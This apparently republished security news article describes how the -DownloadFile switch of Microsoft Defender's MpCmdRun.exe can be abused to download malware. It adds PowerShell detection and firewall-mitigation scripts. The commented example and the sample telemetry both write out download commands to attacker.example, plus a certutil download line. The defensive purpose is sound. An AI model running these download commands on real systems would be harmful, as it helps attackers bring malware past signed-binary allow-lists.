
Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware

Ransomware | BCyber | September 21, 2020


The recently updated MpCmdRun.exe tool that ships with the Windows 10 antivirus can be abused to make Microsoft Defender itself download malware.

Microsoft Defender, formerly Windows Defender, has proven to be a solid antivirus for protecting Windows 10 PCs, laptops and servers from malware, trojans and other malicious scripts. After years of neglect, Microsoft put real work into Windows Defender, retooled it, and renamed it Microsoft Defender. The retooled product is now arguably one of the top anti-malware tools for Windows 10. It is not without fault, however.

A recently updated component of Microsoft Defender can be abused to make Defender download malware on the attacker's behalf. Security researcher Mohammad Askar found that the updated MpCmdRun.exe command-line tool gained a new switch that lets anyone with command execution on the victim's PC, laptop or server fetch arbitrary files from a remote location, using a signed Microsoft binary to do it. This is not a backdoor in the usual sense: it is a legitimate feature that doubles as a living-off-the-land download primitive.

Well, you can download a file from the internet using Windows Defender itself.

In this example, I was able to download Cobalt Strike beacon using the binary “MpCmdRun.exe” which is the “Microsoft Malware Protection Command Line”. pic.twitter.com/RdCira3QPt

— Askar (@mohammadaskar2) September 2, 2020

Microsoft recently shipped an updated version of the Microsoft Antimalware Service Command Line Utility, MpCmdRun.exe. It is the command-line front end to Microsoft Defender Antivirus, used to run scans, update signatures and perform other maintenance tasks from scripts and scheduled tasks. The update adds a -DownloadFile command-line argument, invoked as MpCmdRun.exe -DownloadFile -url <URL> -path <destination>. Askar found that this switch makes the Windows 10 device download any remotely hosted file to a path of the caller's choosing. Because the download is performed by a trusted, signed Microsoft binary, it can slip past controls and allow-lists that only look for unknown or unsigned downloaders.
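As an added example (this is not code from the original article, from Askar's tweet, or from Microsoft), the PowerShell below shows the shape of the abuse described above and a small detection function that flags it in process-creation telemetry such as Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled. The URL, destination path, user names and the sample event records are constructed for illustration; the Platform directory location is the standard Defender install path but is assumed to exist on the machine.

```powershell
# Added example: the MpCmdRun.exe -DownloadFile primitive and a detection for it.
# The URL, destination path and event records below are constructed, not real telemetry.

# 1. Locate the binary. MpCmdRun.exe lives under the Defender platform directory;
#    the versioned folder name varies per machine, so resolve the newest one.
$platformDir = 'C:\ProgramData\Microsoft\Windows Defender\Platform'   # assumed standard path
$mpcmdrun = Get-ChildItem $platformDir -Directory -ErrorAction SilentlyContinue |
    Sort-Object Name -Descending | Select-Object -First 1 |
    ForEach-Object { Join-Path $_.FullName 'MpCmdRun.exe' }

# An attacker with command execution would run something like this
# (placeholder URL; do not point it at a real payload):
#   & $mpcmdrun -DownloadFile -url https://attacker.example/payload.bin -path C:\Users\Public\payload.bin

# 2. Detection: scan process-creation records for MpCmdRun.exe invoked with
#    -DownloadFile and pull out the URL and destination for triage. Legitimate
#    administrative use of this switch should be rare, so any hit is worth a look.
function Find-MpCmdRunDownload {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $image = [IO.Path]::GetFileName([string]$e.Image)
        if ($image -ieq 'MpCmdRun.exe' -and $e.CommandLine -match '(?i)-DownloadFile\b') {
            $url  = if ($e.CommandLine -match '(?i)-url\s+(\S+)')  { $Matches[1] } else { $null }
            $dest = if ($e.CommandLine -match '(?i)-path\s+(\S+)') { $Matches[1] } else { $null }
            [pscustomobject]@{
                Time        = $e.Time
                User        = $e.User
                Url         = $url
                Destination = $dest
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample records: one benign signature update, one abuse, one unrelated LOLBin.
$sample = @(
    [pscustomobject]@{ Time = '2020-09-21T10:00:00Z'; User = 'CORP\alice'
        Image = 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe'
        CommandLine = '"MpCmdRun.exe" -SignatureUpdate' }
    [pscustomobject]@{ Time = '2020-09-21T10:05:00Z'; User = 'CORP\alice'
        Image = 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe'
        CommandLine = 'MpCmdRun.exe -DownloadFile -url https://attacker.example/payload.bin -path C:\Users\Public\payload.bin' }
    [pscustomobject]@{ Time = '2020-09-21T10:06:00Z'; User = 'CORP\bob'
        Image = 'C:\Windows\System32\certutil.exe'
        CommandLine = 'certutil -urlcache -f https://example.org/x.txt x.txt' }
)

Find-MpCmdRunDownload -Events $sample | Format-Table -AutoSize
```

Run against the constructed sample, only the second record is reported: the -SignatureUpdate call is the tool's normal job and the certutil line belongs to a different downloader. In production, feed the function objects built from your SIEM or from Get-WinEvent on the Sysmon operational log, mapping the Image, CommandLine, User and TimeCreated fields to the property names the function expects.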

The download feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9 (reports differ on which build introduced it), and any build carrying the switch can be abused this way. BleepingComputer used Askar's PoC to download resources.exe, the WastedLocker ransomware sample used in the recent Garmin attack.

Fortunately, Microsoft Defender scans files it downloads just like any other file, so it flagged the malicious download. Whether other antivirus products would catch a file fetched by a signed Microsoft binary is not known. The simplest mitigation is to stop MpCmdRun.exe from reaching remote hosts at all: IT admins can add an outbound firewall rule that blocks the binary. Two caveats apply. Windows Firewall program rules match on the executable path, and the versioned Platform folder that holds MpCmdRun.exe changes with each platform update, so the rule has to be refreshed or it silently stops matching. And a firewall rule does nothing for hosts where the attacker already has network access through other means, so process-creation telemetry should also be watched for MpCmdRun.exe invoked with -DownloadFile.
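The firewall mitigation described above, as an added example rather than code from the original article or from Microsoft. It must run in an elevated PowerShell session; the rule display name and the use of example.org for the post-change check are arbitrary choices, and the two install paths are the standard Defender locations but are assumed to exist.

```powershell
# Added example: block outbound traffic from every MpCmdRun.exe on the host
# using Windows Defender Firewall, then verify the block. Requires elevation.

$platformDir = 'C:\ProgramData\Microsoft\Windows Defender\Platform'   # assumed standard path
$candidates  = @('C:\Program Files\Windows Defender\MpCmdRun.exe') +
    (Get-ChildItem $platformDir -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'MpCmdRun.exe' })

# Program rules cannot use wildcards in the path, so one rule per existing binary.
# Re-running this script after a platform update picks up the new versioned folder.
$ruleBase = 'Block MpCmdRun.exe outbound'   # arbitrary display-name prefix
$n = 0
foreach ($exe in ($candidates | Where-Object { Test-Path $_ })) {
    $n++
    $name = "$ruleBase ($n)"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Action Block `
            -Program $exe -Profile Any -Enabled True | Out-Null
    }
    Write-Host "Blocked outbound: $exe"
}

# Show what is now in place, with the path each rule is bound to.
Get-NetFirewallRule -DisplayName "$ruleBase*" |
    ForEach-Object {
        $prog = ($_ | Get-NetFirewallApplicationFilter).Program
        [pscustomobject]@{ Rule = $_.DisplayName; Enabled = $_.Enabled; Program = $prog }
    } | Format-Table -AutoSize

# Verify: with the rule in place, the download primitive should fail and leave no file.
$newest = $candidates | Where-Object { Test-Path $_ } | Select-Object -Last 1
$probe  = Join-Path $env:TEMP 'mpcmdrun-fw-probe.txt'
Remove-Item $probe -ErrorAction SilentlyContinue
& $newest -DownloadFile -url 'https://example.org/' -path $probe | Out-Null
if (Test-Path $probe) {
    Write-Warning "Download succeeded; the firewall rule is not matching $newest"
} else {
    Write-Host 'Download blocked as expected.'
}
```

After applying the rule, confirm that definition updates still succeed in your environment (for instance by running MpCmdRun.exe -SignatureUpdate and checking the result in the Defender UI); if your update path depends on this binary reaching the network, the rule needs an exception for the update hosts rather than a blanket block.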

The post Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware appeared first on AndroidRookies.

This content was originally published here.

Written by: BCyber
